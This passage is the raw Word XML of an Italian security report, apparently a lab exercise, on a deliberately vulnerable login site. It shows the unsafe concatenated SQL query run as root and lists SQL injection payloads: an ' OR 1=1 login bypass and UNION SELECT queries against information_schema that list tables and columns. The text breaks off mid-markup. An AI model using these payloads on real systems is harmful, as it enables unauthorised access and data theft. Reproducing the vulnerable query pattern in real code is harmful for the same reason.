    <w:p w14:paraId="494D24D8" w14:textId="7E8688DF" w:rsidR="0082536D" w:rsidRDefault="0082536D" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc232068345"/>
      <w:bookmarkStart w:id="15" w:name="_Toc232079412"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SITO INDIFESO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="42BB6C4C" w14:textId="77777777" w:rsidR="0082536D" w:rsidRPr="00483468" w:rsidRDefault="0082536D" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFC63AC" w14:textId="77777777" w:rsidR="00824C58" w:rsidRDefault="00A608E6" w:rsidP="00824C58">
      <w:p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Sul sito indifeso la richiesta per recuperare l’utente è semplicemente un’operazione di SELECT </w:t>
      </w:r>
      <w:r w:rsidR="003E5198">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>semplice inserendo username e password così come li ha inseriti l’utente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C021DB" w14:textId="77777777" w:rsidR="00824C58" w:rsidRDefault="00824C58" w:rsidP="00824C58">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C56C8F" w14:textId="31FA0ADE" w:rsidR="00824C58" w:rsidRPr="00824C58" w:rsidRDefault="00824C58" w:rsidP="00824C58">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86B8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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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E86B8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* </w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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E86B8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users </w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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E86B8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username = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B87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'$username'</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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E86B87">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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E86B8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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B8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E86B8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= </w:t>
      </w:r>
      <w:r w:rsidRPr="00E86B87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'$password'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF147C0" w14:textId="77777777" w:rsidR="00756352" w:rsidRPr="00824C58" w:rsidRDefault="00756352" w:rsidP="00756352">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F502EE" w14:textId="0911E805" w:rsidR="003E5198" w:rsidRDefault="003E5198" w:rsidP="00756352">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5198">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Questa query viene poi e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">seguita </w:t>
      </w:r>
      <w:r w:rsidR="001D0118">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">dal DBMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">usando </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5198">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>l’utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">e tramite la funzione </w:t>
      </w:r>
      <w:r w:rsidR="001D0118">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>multi_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> che consente l’esecuzione di molteplici query</w:t>
      </w:r>
      <w:r w:rsidR="001D0118">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> in sequenza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA20ECB" w14:textId="67C45175" w:rsidR="003E5198" w:rsidRPr="003E5198" w:rsidRDefault="003E5198" w:rsidP="00756352">
      <w:p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Poiché non c’è </w:t>
      </w:r>
      <w:r w:rsidR="00657642">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">alcun controllo o sanificazione dell’input, il sistema </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>risulta</w:t>
      </w:r>
      <w:r w:rsidR="00657642">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> estremamente vulnerabile ad attacchi di tipo SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3BCCE" w14:textId="77777777" w:rsidR="003E5198" w:rsidRPr="003E5198" w:rsidRDefault="003E5198" w:rsidP="00756352">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A99C790" w14:textId="4F01A0F8" w:rsidR="00756352" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc232068346"/>
      <w:bookmarkStart w:id="17" w:name="_Toc232079413"/>
      <w:r>
        <w:t>Invio Automatico dei Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="65BED7BD" w14:textId="4D0787F9" w:rsidR="00756352" w:rsidRPr="008E6098" w:rsidRDefault="00657642" w:rsidP="00657642">
      <w:r>
        <w:t>Per semplificare</w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t xml:space="preserve"> e dimostrare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’invio degli attacchi </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t xml:space="preserve">descritti in seguito, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">abbiamo utilizzato uno script </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00657642">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sql_injection.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) che </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t xml:space="preserve">automatizza l’invio dei payload, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stampando a terminale </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r>
        <w:t>risposta della pagina web.</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6098">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6098">
        <w:t xml:space="preserve">li stessi payload </w:t>
      </w:r>
      <w:r w:rsidR="00F801B0">
        <w:t xml:space="preserve">possono comunque essere inseriti </w:t>
      </w:r>
      <w:r w:rsidRPr="008E6098">
        <w:t>manualmente tramite il form dell’interfaccia web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560025E5" w14:textId="56A9BFF8" w:rsidR="00657642" w:rsidRDefault="00657642" w:rsidP="00657642">
      <w:r w:rsidRPr="008E6098">
        <w:t>È possibile eseguire lo scrip</w:t>
      </w:r>
      <w:r w:rsidR="008E6098">
        <w:t>t da terminale eseguendo questo comando nella cartella del progetto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A988825" w14:textId="6EB06E00" w:rsidR="008E6098" w:rsidRDefault="008E6098" w:rsidP="008E6098">
      <w:pPr>
        <w:pStyle w:val="Code1"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6098">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6098">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6098">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sql_injection.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="675FFBB3" w14:textId="77777777" w:rsidR="0092508A" w:rsidRDefault="008E6098" w:rsidP="0092508A">
      <w:r>
        <w:t>(è necessario installare in precedenza PHP sul sistema operativo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CE59D" w14:textId="77777777" w:rsidR="0092508A" w:rsidRPr="00F601CD" w:rsidRDefault="0092508A" w:rsidP="00C01BAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E7C8FF" w14:textId="3BDADC78" w:rsidR="00756352" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc232068347"/>
      <w:bookmarkStart w:id="19" w:name="_Toc232079414"/>
      <w:r>
        <w:t>Esempi di Attacc</w:t>
      </w:r>
      <w:r w:rsidR="00D97E08">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>i di SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4116DF24" w14:textId="32F53930" w:rsidR="00756352" w:rsidRPr="00756352" w:rsidRDefault="00760E5D" w:rsidP="00756352">
      <w:p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Esempi di </w:t>
      </w:r>
      <w:r w:rsidR="008E6098">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>attacchi di tipo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection che un attaccante può eseguire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4593E" w14:textId="77777777" w:rsidR="005E0A32" w:rsidRDefault="00760E5D" w:rsidP="005E0A32">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc232079415"/>
      <w:r w:rsidRPr="00AD15F2">
        <w:t>Scoprire il DB (Confidenzialità violata)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="72156DAD" w14:textId="11C9AE4F" w:rsidR="00512F70" w:rsidRDefault="00F8039B" w:rsidP="005E0A32">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Possiamo scoprire </w:t>
      </w:r>
      <w:r w:rsidR="00760E5D" w:rsidRPr="00F8039B">
        <w:t>le varie tabelle del DB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B10B75" w14:textId="5D3E68C0" w:rsidR="00414EF6" w:rsidRDefault="00760E5D" w:rsidP="00414EF6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Il comando tautologia</w:t>
      </w:r>
      <w:r w:rsidR="006D5A48">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> imposta la clausola </w:t>
      </w:r>
      <w:r w:rsidR="006D5A48" w:rsidRPr="006D5A48">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidR="006D5A48">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendendola sempre vera</w:t>
      </w:r>
      <w:r w:rsidR="00883B58">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25D201" w14:textId="411027AC" w:rsidR="00406A2B" w:rsidRPr="00414EF6" w:rsidRDefault="00414EF6" w:rsidP="00414EF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00320C19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</w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00320C19">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00320C19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00320C19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</w:rPr>
        <w:t>1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE0A41" w14:textId="70B508F7" w:rsidR="001B6919" w:rsidRDefault="001B6919" w:rsidP="00406A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00406A2B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">È il modo più veloce </w:t>
      </w:r>
      <w:r w:rsidR="00E95C81" w:rsidRPr="00406A2B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>per bypassare la tabella usata per il login e accedere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A4B46" w14:textId="51D4FC6E" w:rsidR="00451A64" w:rsidRPr="00451A64" w:rsidRDefault="00451A64" w:rsidP="00451A64">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6292">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E4FB46" wp14:editId="2AB023E4">
            <wp:extent cx="5368637" cy="1867609"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="164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4916" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="3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475" cy="187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D6525" w14:textId="77777777" w:rsidR="00414EF6" w:rsidRDefault="00BC44B5" w:rsidP="00414EF6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Con il comando</w:t>
      </w:r>
      <w:r w:rsidR="00406A2B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5720FA" w14:textId="08B968B7" w:rsidR="00414EF6" w:rsidRPr="00414EF6" w:rsidRDefault="00414EF6" w:rsidP="00414EF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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' </w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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100582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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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100582">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r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, GROUP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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), </w:t>
      </w:r>
      <w:r w:rsidRPr="00100582">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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100582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 xml:space="preserve">FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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proofErr w:type="spellStart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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00100582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DATABASE</w:t>
      </w:r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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00100582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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00100582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 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0C269" w14:textId="4B651F9C" w:rsidR="00127B95" w:rsidRDefault="00563379" w:rsidP="00E95C81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95C81">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Effettuiamo un UNION SELECT sulla tabella </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E95C81">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E95C81">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E95C81">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> che contiene</w:t>
      </w:r>
      <w:r w:rsidR="00E95C81">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E95C81">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">tutte le tabelle del DB per </w:t>
      </w:r>
      <w:r w:rsidRPr="00E95C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">scoprire </w:t>
      </w:r>
      <w:r w:rsidR="00E95C81" w:rsidRPr="00E95C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>i nomi delle tabelle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DF488" w14:textId="3F868F25" w:rsidR="00DC6292" w:rsidRPr="00DC6292" w:rsidRDefault="00DC6292" w:rsidP="00451A64">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6292">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62315520" wp14:editId="52949884">
            <wp:extent cx="5382491" cy="884078"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9079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4916" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect t="7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744" cy="892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3E0A6" w14:textId="77777777" w:rsidR="006713B8" w:rsidRDefault="006713B8" w:rsidP="006713B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101AFB8C" w14:textId="77777777" w:rsidR="006713B8" w:rsidRPr="006713B8" w:rsidRDefault="006713B8" w:rsidP="006713B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C475F95" w14:textId="747E3FEC" w:rsidR="00F8039B" w:rsidRDefault="00BC44B5" w:rsidP="00AD15F2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc232079416"/>
      <w:r w:rsidRPr="00AD15F2">
        <w:t>Esfiltrare i dati contenuti nelle tabelle (Confidenzialità violata</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD15F2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2DC5BA3D" w14:textId="091D0998" w:rsidR="00BC44B5" w:rsidRPr="00AD15F2" w:rsidRDefault="006D5A48" w:rsidP="006D5A48">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Dopo aver scoperto i nomi delle tabelle, p</w:t>
      </w:r>
      <w:r w:rsidR="00BC44B5" w:rsidRPr="00AD15F2">
        <w:t>ossiamo usare questi comandi per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> analizzarne la struttura e estrarne i dati</w:t>
      </w:r>
      <w:r w:rsidR="00BC44B5" w:rsidRPr="00AD15F2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC8C33" w14:textId="77777777" w:rsidR="00F761C8" w:rsidRDefault="00BC44B5" w:rsidP="00F761C8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Con i comandi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E902FEA" w14:textId="77777777" w:rsidR="00342751" w:rsidRDefault="00F761C8" w:rsidP="00342751">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="008200"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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' UNION SELECT NULL, GROUP_</w:t>
      </w:r>
      <w:proofErr w:type="gram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CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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), NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spell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information_</w:t>
      </w:r>
      <w:proofErr w:type="gram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schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spell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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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='</w:t>
      </w:r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users' </w:t>
      </w:r>
      <w:r w:rsidRPr="00342751">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:highlight w:val="lightGray"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00342751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proofErr w:type="spellStart"/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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00342751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DATABASE</w:t>
      </w:r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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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)</w:t>
      </w:r>
      <w:r w:rsidRPr="00342751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 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB50574" w14:textId="77777777" w:rsidR="00342751" w:rsidRDefault="00342751" w:rsidP="00342751">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
